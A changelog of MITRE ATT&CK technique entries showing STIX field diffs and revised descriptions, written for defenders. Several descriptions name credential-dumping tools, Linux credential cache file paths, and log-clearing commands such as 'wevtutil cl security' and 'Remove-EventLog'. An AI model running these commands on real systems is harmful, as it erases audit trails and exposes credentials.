>attack.mitre.org/techniques/T1562) and/or in support of a [N>tps://attack.mitre.org/techniques/T1565/002). Adversaries ca
>etwork Denial of Service](https://attack.mitre.org/technique>n setup a position similar to AiTM to prevent traffic from f
>s/T1498).>lowing to the appropriate destination, potentially to [Impai
 >r Defenses](https://attack.mitre.org/techniques/T1562) and/o
 >r in support of a [Network Denial of Service](https://attack
 >.mitre.org/techniques/T1498).
Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-27 20:27:50.792000+00:002024-04-18 14:26:21.852000+00:00
descriptionAdversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Token tactics', 'description': 'Microsoft Incident Response. (2022, November 16). Token tactics: How to prevent, detect, and respond to cloud token theft. Retrieved December 26, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/'}

[T1059.002] Command and Scripting Interpreter: AppleScript

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 15:37:28.071000+00:002024-03-01 19:06:05.126000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[T1550.001] Use Alternate Authentication Material: Application Access Token

Current version: 1.6

Version changed from: 1.5 → 1.6

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-19 21:24:45.231000+00:002024-04-12 21:18:28.848000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.51.6
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsBlake Strom, Microsoft Threat Intelligence

[T1071] Application Layer Protocol

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may communicate using OSI application layer prott1Adversaries may communicate using OSI application layer prot
>ocols to avoid detection/network filtering by blending in wi>ocols to avoid detection/network filtering by blending in wi
>th existing traffic. Commands to the remote system, and ofte>th existing traffic. Commands to the remote system, and ofte
>n the results of those commands, will be embedded within the>n the results of those commands, will be embedded within the
> protocol traffic between the client and server.   Adversari> protocol traffic between the client and server.   Adversari
>es may utilize many different protocols, including those use>es may utilize many different protocols, including those use
>d for web browsing, transferring files, electronic mail, or >d for web browsing, transferring files, electronic mail, or 
>DNS. For connections that occur internally within an enclave>DNS. For connections that occur internally within an enclave
> (such as those between a proxy or pivot node and other node> (such as those between a proxy or pivot node and other node
>s), commonly used protocols are SMB, SSH, or RDP. >s), commonly used protocols are SMB, SSH, or RDP.(Citation: 
 >Mandiant APT29 Eye Spy Email Nov 22) 

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-11 14:35:41.468000+00:002024-01-17 22:52:23.454000+00:00
descriptionAdversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Mandiant APT29 Eye Spy Email Nov 22', 'description': 'Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.', 'url': 'https://www.mandiant.com/resources/blog/unc3524-eye-spy-email'}
x_mitre_platformsNetwork

[T1573.002] Encrypted Channel: Asymmetric Cryptography

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 19:27:46.484000+00:002023-12-26 20:59:21.941000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1053.002] Scheduled Task/Job: At

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-11 21:13:52.767000+00:002023-11-15 14:38:10.876000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2

[T1119] Automated Collection

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Once established within a system or network, an adversary mat1Once established within a system or network, an adversary ma
>y use automated techniques for collecting internal data. Met>y use automated techniques for collecting internal data. Met
>hods for performing this technique could include use of a [C>hods for performing this technique could include use of a [C
>ommand and Scripting Interpreter](https://attack.mitre.org/t>ommand and Scripting Interpreter](https://attack.mitre.org/t
>echniques/T1059) to search for and copy information fitting >echniques/T1059) to search for and copy information fitting 
>set criteria such as file type, location, or name at specifi>set criteria such as file type, location, or name at specifi
>c time intervals. In cloud-based environments, adversaries m>c time intervals.   In cloud-based environments, adversaries
>ay also use cloud APIs, command line interfaces, or extract,> may also use cloud APIs, data pipelines, command line inter
> transform, and load (ETL) services to automatically collect>faces, or extract, transform, and load (ETL) services to aut
> data. This functionality could also be built into remote ac>omatically collect data.(Citation: Mandiant UNC3944 SMS Phis
>cess tools.   This technique may incorporate use of other te>hing 2023)   This functionality could also be built into rem
>chniques such as [File and Directory Discovery](https://atta>ote access tools.   This technique may incorporate use of ot
>ck.mitre.org/techniques/T1083) and [Lateral Tool Transfer](h>her techniques such as [File and Directory Discovery](https:
>ttps://attack.mitre.org/techniques/T1570) to identify and mo>//attack.mitre.org/techniques/T1083) and [Lateral Tool Trans
>ve files, as well as [Cloud Service Dashboard](https://attac>fer](https://attack.mitre.org/techniques/T1570) to identify 
>k.mitre.org/techniques/T1538) and [Cloud Storage Object Disc>and move files, as well as [Cloud Service Dashboard](https:/
>overy](https://attack.mitre.org/techniques/T1619) to identif>/attack.mitre.org/techniques/T1538) and [Cloud Storage Objec
>y resources in cloud environments.>t Discovery](https://attack.mitre.org/techniques/T1619) to i
 >dentify resources in cloud environments.
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 18:40:24.795000+00:002024-01-02 13:35:57.680000+00:00
descriptionOnce established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023) This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Mandiant UNC3944 SMS Phishing 2023', 'description': 'Mandiant Intelligence. (2023, September 14). Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety. Retrieved January 2, 2024.', 'url': 'https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware'}

[T1547] Boot or Logon Autostart Execution

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:42.099000+00:002024-04-16 12:26:07.945000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1037] Boot or Logon Initialization Scripts

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1Adversaries may use scripts automatically executed at boot ot1Adversaries may use scripts automatically executed at boot o
>r logon initialization to establish persistence. Initializat>r logon initialization to establish persistence.(Citation: M
>ion scripts can be used to perform administrative functions,>andiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke 
> which may often execute other programs or send information >March 2019) Initialization scripts can be used to perform ad
>to an internal logging server. These scripts can vary based >ministrative functions, which may often execute other progra
>on operating system and whether applied locally or remotely.>ms or send information to an internal logging server. These 
>    Adversaries may use these scripts to maintain persistenc>scripts can vary based on operating system and whether appli
>e on a single system. Depending on the access configuration >ed locally or remotely.    Adversaries may use these scripts
>of the logon scripts, either local credentials or an adminis> to maintain persistence on a single system. Depending on th
>trator account may be necessary.   An adversary may also be >e access configuration of the logon scripts, either local cr
>able to escalate their privileges since some boot or logon i>edentials or an administrator account may be necessary.   An
>nitialization scripts run with higher privileges.> adversary may also be able to escalate their privileges sin
 >ce some boot or logon initialization scripts run with higher
 > privileges.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-11 20:54:55.991000+00:002024-04-16 12:23:13.621000+00:00
descriptionAdversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Anomali Rocke March 2019', 'description': 'Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.', 'url': 'https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang'}
external_references{'source_name': 'Mandiant APT29 Eye Spy Email Nov 22', 'description': 'Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.', 'url': 'https://www.mandiant.com/resources/blog/unc3524-eye-spy-email'}
x_mitre_platformsNetwork

[T1176] Browser Extensions

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may abuse Internet browser extensions to establit1Adversaries may abuse Internet browser extensions to establi
>sh persistent access to victim systems. Browser extensions o>sh persistent access to victim systems. Browser extensions o
>r plugins are small programs that can add functionality and >r plugins are small programs that can add functionality and 
>customize aspects of Internet browsers. They can be installe>customize aspects of Internet browsers. They can be installe
>d directly or through a browser's app store and generally ha>d directly or through a browser's app store and generally ha
>ve access and permissions to everything that the browser can>ve access and permissions to everything that the browser can
> access.(Citation: Wikipedia Browser Extension)(Citation: Ch> access.(Citation: Wikipedia Browser Extension)(Citation: Ch
>rome Extensions Definition)  Malicious extensions can be ins>rome Extensions Definition)  Malicious extensions can be ins
>talled into a browser through malicious app store downloads >talled into a browser through malicious app store downloads 
>masquerading as legitimate extensions, through social engine>masquerading as legitimate extensions, through social engine
>ering, or by an adversary that has already compromised a sys>ering, or by an adversary that has already compromised a sys
>tem. Security can be limited on browser app stores so it may>tem. Security can be limited on browser app stores so it may
> not be difficult for malicious extensions to defeat automat> not be difficult for malicious extensions to defeat automat
>ed scanners.(Citation: Malicious Chrome Extension Numbers) D>ed scanners.(Citation: Malicious Chrome Extension Numbers) D
>epending on the browser, adversaries may also manipulate an >epending on the browser, adversaries may also manipulate an 
>extension's update url to install updates from an adversary >extension's update url to install updates from an adversary 
>controlled server or manipulate the mobile configuration fil>controlled server or manipulate the mobile configuration fil
>e to silently install additional extensions.  Previous to ma>e to silently install additional extensions.  Previous to ma
>cOS 11, adversaries could silently install browser extension>cOS 11, adversaries could silently install browser extension
>s via the command line using the <code>profiles</code> tool >s via the command line using the <code>profiles</code> tool 
>to install malicious <code>.mobileconfig</code> files. In ma>to install malicious <code>.mobileconfig</code> files. In ma
>cOS 11+, the use of the <code>profiles</code> tool can no lo>cOS 11+, the use of the <code>profiles</code> tool can no lo
>nger install configuration profiles, however <code>.mobileco>nger install configuration profiles, however <code>.mobileco
>nfig</code> files can be planted and installed with user int>nfig</code> files can be planted and installed with user int
>eraction.(Citation: xorrior chrome extensions macOS)  Once t>eraction.(Citation: xorrior chrome extensions macOS)  Once t
>he extension is installed, it can browse to websites in the >he extension is installed, it can browse to websites in the 
>background, steal all information that a user enters into a >background, steal all information that a user enters into a 
>browser (including credentials), and be used as an installer>browser (including credentials), and be used as an installer
> for a RAT for persistence.(Citation: Chrome Extension Crypt> for a RAT for persistence.(Citation: Chrome Extension Crypt
>o Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banke>o Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banke
>r Google Chrome Extension Steals Creds)(Citation: Catch All >r Google Chrome Extension Steals Creds)(Citation: Catch All 
>Chrome Extension)  There have also been instances of botnets>Chrome Extension)  There have also been instances of botnets
> using a persistent backdoor through malicious Chrome extens> using a persistent backdoor through malicious Chrome extens
>ions.(Citation: Stantinko Botnet) There have also been simil>ions for [Command and Control](https://attack.mitre.org/tact
>ar examples of extensions being used for command & control.(>ics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Ex
>Citation: Chrome Extension C2 Malware)>tension C2 Malware) Adversaries may also use browser extensi
 >ons to modify browser permissions and components, privacy se
 >ttings, and other security controls for [Defense Evasion](ht
 >tps://attack.mitre.org/tactics/TA0005).(Citation: Browers Fr
 >iarFox)(Citation: Browser Adrozek) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:46:36.707000+00:002024-04-18 23:22:37.874000+00:00
descriptionAdversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Browser Adrozek', 'description': 'Microsoft Threat Intelligence. (2020, December 10). Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers. Retrieved February 26, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/'}
external_references{'source_name': 'Browers FriarFox', 'description': 'Raggi, Michael. Proofpoint Threat Research Team. (2021, February 25). TA413 Leverages New FriarFox Browser Extension to Target the Gmail Accounts of Global Tibetan Organizations. Retrieved February 26, 2024.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global'}
x_mitre_contributorsManikantan Srinivasan, NEC Corporation India

[T1003.005] OS Credential Dumping: Cached Domain Credentials

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may attempt to access cached domain credentials t1Adversaries may attempt to access cached domain credentials 
>used to allow authentication to occur in the event a domain >used to allow authentication to occur in the event a domain 
>controller is unavailable.(Citation: Microsoft - Cached Cred>controller is unavailable.(Citation: Microsoft - Cached Cred
>s)  On Windows Vista and newer, the hash format is DCC2 (Dom>s)  On Windows Vista and newer, the hash format is DCC2 (Dom
>ain Cached Credentials version 2) hash, also known as MS-Cac>ain Cached Credentials version 2) hash, also known as MS-Cac
>he v2 hash.(Citation: PassLib mscache) The number of default>he v2 hash.(Citation: PassLib mscache) The number of default
> cached credentials varies and can be altered per system. Th> cached credentials varies and can be altered per system. Th
>is hash does not allow pass-the-hash style attacks, and inst>is hash does not allow pass-the-hash style attacks, and inst
>ead requires [Password Cracking](https://attack.mitre.org/te>ead requires [Password Cracking](https://attack.mitre.org/te
>chniques/T1110/002) to recover the plaintext password.(Citat>chniques/T1110/002) to recover the plaintext password.(Citat
>ion: ired mscache)  With SYSTEM access, the tools/utilities >ion: ired mscache)  On Linux systems, Active Directory crede
>such as [Mimikatz](https://attack.mitre.org/software/S0002),>ntials can be accessed through caches maintained by software
> [Reg](https://attack.mitre.org/software/S0075), and secrets> like System Security Services Daemon (SSSD) or Quest Authen
>dump.py can be used to extract the cached credentials.  Note>tication Services (formerly VAS). Cached credential hashes a
>: Cached credentials for Windows Vista are derived using PBK>re typically located at `/var/lib/sss/db/cache.[domain].ldb`
>DF2.(Citation: PassLib mscache)> for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for
 > Quest. Adversaries can use utilities, such as `tdbdump`, on
 > these database files to dump the cached hashes and use [Pas
 >sword Cracking](https://attack.mitre.org/techniques/T1110/00
 >2) to obtain the plaintext password.(Citation: Brining MimiK
 >atz to Unix)   With SYSTEM or sudo access, the tools/utiliti
 >es such as [Mimikatz](https://attack.mitre.org/software/S000
 >2), [Reg](https://attack.mitre.org/software/S0075), and secr
 >etsdump.py for Windows or Linikatz for Linux can be used to 
 >extract the cached credentials.(Citation: Brining MimiKatz t
 >o Unix)  Note: Cached credentials for Windows Vista are deri
 >ved using PBKDF2.(Citation: PassLib mscache)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-19 18:37:57.025000+00:002024-04-18 23:47:54.553000+00:00
descriptionAdversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds) On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache) With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials. Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds) On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache) On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix) Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Brining MimiKatz to Unix', 'description': 'Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.', 'url': 'https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf'}
x_mitre_contributorsTim (Wadhwa-)Brown
x_mitre_contributorsYves Yonan
x_mitre_platformsLinux

[T1070.003] Indicator Removal: Clear Command History

Current version: 1.5

Version changed from: 1.4 → 1.5

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-07 17:20:44.770000+00:002024-02-14 20:07:44.756000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1070.001] Indicator Removal: Clear Windows Event Logs

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may clear Windows Event Logs to hide the activitt1Adversaries may clear Windows Event Logs to hide the activit
>y of an intrusion. Windows Event Logs are a record of a comp>y of an intrusion. Windows Event Logs are a record of a comp
>uter's alerts and notifications. There are three system-defi>uter's alerts and notifications. There are three system-defi
>ned sources of events: System, Application, and Security, wi>ned sources of events: System, Application, and Security, wi
>th five event types: Error, Warning, Information, Success Au>th five event types: Error, Warning, Information, Success Au
>dit, and Failure Audit.  The event logs can be cleared with >dit, and Failure Audit.   With administrator privileges, the
>the following utility commands:  * <code>wevtutil cl system<> event logs can be cleared with the following utility comman
>/code> * <code>wevtutil cl application</code> * <code>wevtut>ds:  * <code>wevtutil cl system</code> * <code>wevtutil cl a
>il cl security</code>  These logs may also be cleared throug>pplication</code> * <code>wevtutil cl security</code>  These
>h other mechanisms, such as the event viewer GUI or [PowerSh> logs may also be cleared through other mechanisms, such as 
>ell](https://attack.mitre.org/techniques/T1059/001). For exa>the event viewer GUI or [PowerShell](https://attack.mitre.or
>mple, adversaries may use the PowerShell command <code>Remov>g/techniques/T1059/001). For example, adversaries may use th
>e-EventLog -LogName Security</code> to delete the Security E>e PowerShell command <code>Remove-EventLog -LogName Security
>ventLog and after reboot, disable future logging. Note: even></code> to delete the Security EventLog and after reboot, di
>ts may still be generated and logged in the .evtx file betwe>sable future logging.  Note: events may still be generated a
>en the time the command is run and the reboot.(Citation: dis>nd logged in the .evtx file between the time the command is 
>able_win_evt_logging)>run and the reboot.(Citation: disable_win_evt_logging)  Adve
 >rsaries may also attempt to clear logs by directly deleting 
 >the stored log files within `C:\Windows\System32\winevt\logs
 >\`.
Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_system_requirements['Clearing the Windows event logs requires Administrator permissions']
values_changed
STIX FieldOld valueNew Value
modified2023-08-11 21:43:04.568000+00:002024-04-16 12:40:58.536000+00:00
